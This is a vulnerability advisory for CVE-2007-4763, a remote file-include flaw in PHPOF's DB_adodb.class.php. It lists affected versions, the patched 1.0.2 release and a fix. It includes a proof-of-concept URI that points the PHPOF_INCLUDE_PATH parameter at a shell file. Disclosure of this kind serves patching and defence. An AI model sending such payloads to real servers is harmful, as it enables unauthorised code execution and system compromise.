PHPOF DB_AdoDB.Class.PHP Remote File Include Vulnerability

Bugtraq ID:	25541
Class:	Input Validation Error
CVE:	CVE-2007-4763
Remote:	Yes
Local:	No
Published:	Sep 04 2007 12:00AM
Updated:	Dec 31 2008 09:02PM
Credit:	ThE TiGeR is credited with the discovery of this vulnerability.
Vulnerable:	PHPOF PHPOF 1.0.1 PHPOF PHPOF 1.0 PHPOF PHPOF 20040226
Not Vulnerable:	PHPOF PHPOF 1.0.2

PHPOF DB_AdoDB.Class.PHP Remote File Include Vulnerability

PHPOF is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

PHPOF snapshot 20040226 is vulnerable; other versions may also be affected.

PHPOF DB_AdoDB.Class.PHP Remote File Include Vulnerability

An attacker can exploit this issue via a browser.

The following proof-of-concept URI is available:

http://www.example.com/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=shell.txt?

PHPOF DB_AdoDB.Class.PHP Remote File Include Vulnerability

Solution:
Vendor updates are available.


PHPOF PHPOF 20040226

• PHPOF PHPOF-1.0.2.tgz
  http://pear.timj.co.uk/get/PHPOF-1.0.2.tgz

PHPOF PHPOF 1.0

• PHPOF PHPOF-1.0.2.tgz
  http://pear.timj.co.uk/get/PHPOF-1.0.2.tgz

PHPOF PHPOF 1.0.1

• PHPOF PHPOF-1.0.2.tgz
  http://pear.timj.co.uk/get/PHPOF-1.0.2.tgz

PHPOF DB_AdoDB.Class.PHP Remote File Include Vulnerability

References:

• PHPOF v1: CVE-2007-4763 statement (PHPOF)
  
• Vendor Homepage (PHPOF)